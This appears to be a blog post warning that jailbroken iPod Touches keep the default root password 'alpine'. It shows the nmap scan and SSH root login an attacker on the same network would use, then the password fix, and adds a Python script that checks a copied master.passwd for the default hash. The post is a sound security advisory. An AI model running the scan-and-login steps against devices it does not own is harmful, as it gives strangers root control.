iPod Touch Vulnerability after Jailbreak

As you may or may not know, there is a vulnerability on an iPod Touch after jailbreak: the root password is hard-coded as “alpine”. If your iPod Touch connects to a hotspot network, anyone on the same subnet can do the following:

  1. Scan the whole subnet with Nmap:
     sudo nmap -A -O -T4 112.55.82.0/24

  2. The scan result will be shown as follows:
     Interesting ports on ******* (112.55.82.202):
     PORT STATE SERVICE VERSION
     22/tcp open ssh OpenSSH 5.2 (protocol 2.0)
     62078/tcp open tcpwrapped
     ….
     Running (JUST GUESSING) : Apple embedded (93%), Apple iPhone OS 1.X (89%)

  3. Then the most likely thing they want to do is log in over SSH with the default password:
     ssh root@112.55.82.202
     Password: alpine

  4. Then, as you can guess, they can do whatever they want:
     John-Smiths-iPod:/ root# ls
     Applications@  Library/  User@  boot/   dev/  lib/  private/  tmp@  var@
     Developer/     System/   bin/   cores/  etc@  mnt/  sbin/     usr/

The solution is very simple: just change the root password after jailbreaking. Open the Terminal application on the iPod and do the following:

  • Type su - to enter super user mode
  • Type passwd and enter the new password
  • Type the new password again when prompted
  • Type exit. We are done.
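To confirm the change actually took, the root entry in /etc/master.passwd (where iOS keeps the account password hashes) should no longer verify against “alpine”. The following is an added example, not code from the original post: a small audit script you run on any machine with Python against a copy of that file. It assumes the file uses the BSD master.passwd layout (username, hash, ...), and the two sample entries are constructed here, not taken from a real device.

```python
"""Audit helper: does the root entry in master.passwd still verify against the
well-known default password "alpine"? Added example, not from the original post."""
import ctypes
import ctypes.util
import sys

try:
    import crypt as _crypt  # standard library on Python <= 3.12

    def _crypt_fn(word: str, salt: str) -> str:
        return _crypt.crypt(word, salt)
except ImportError:  # Python 3.13 removed the crypt module: call libcrypt through ctypes instead
    _lib = ctypes.CDLL(ctypes.util.find_library("crypt") or "libcrypt.so.1")
    _lib.crypt.restype = ctypes.c_char_p
    _lib.crypt.argtypes = [ctypes.c_char_p, ctypes.c_char_p]

    def _crypt_fn(word: str, salt: str) -> str:
        out = _lib.crypt(word.encode(), salt.encode())
        if out is None:
            raise RuntimeError("libcrypt rejected the salt/hash format")
        return out.decode()

DEFAULT_PASSWORD = "alpine"


def root_hash(master_passwd_text: str) -> str:
    """Return the password-hash field of the 'root' entry (second colon-separated field)."""
    for line in master_passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[0] == "root":
            return fields[1]
    raise ValueError("no root entry found in master.passwd text")


def uses_default_password(master_passwd_text: str, candidate: str = DEFAULT_PASSWORD) -> bool:
    """True if the stored root hash verifies against `candidate` (i.e. the password was never changed).

    crypt(3) takes the stored hash as its salt argument and reproduces the same hash if
    the password matches, for both the old 2-character DES format and the $id$ formats."""
    stored = root_hash(master_passwd_text)
    if len(stored) < 2 or stored.startswith("*") or stored.startswith("!"):
        return False  # locked or empty entries cannot be "alpine"
    return _crypt_fn(candidate, stored) == stored


# Constructed sample entries (the real file has more users; only the first two fields matter).
# Old iOS builds store the root hash in traditional DES format, so the "unchanged" sample uses that.
SAMPLE_UNCHANGED = (
    "root:" + _crypt_fn("alpine", "/s") + ":0:0::0:0:System Administrator:/var/root:/bin/sh\n"
)
SAMPLE_CHANGED = (
    "root:" + _crypt_fn("newpass7", "$6$examplesalt$") + ":0:0::0:0:System Administrator:/var/root:/bin/sh\n"
)

if __name__ == "__main__":
    # Usage: python audit_root_pw.py /path/to/copied/master.passwd
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_UNCHANGED
    if uses_default_password(text):
        print("root still uses the default password 'alpine': change it now")
    else:
        print("root password is not the default")
```

Copy the file off the device (for example with scp after you have set a new password) and point the script at it; the check is read-only and never modifies the file.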

Good luck and Thanks,
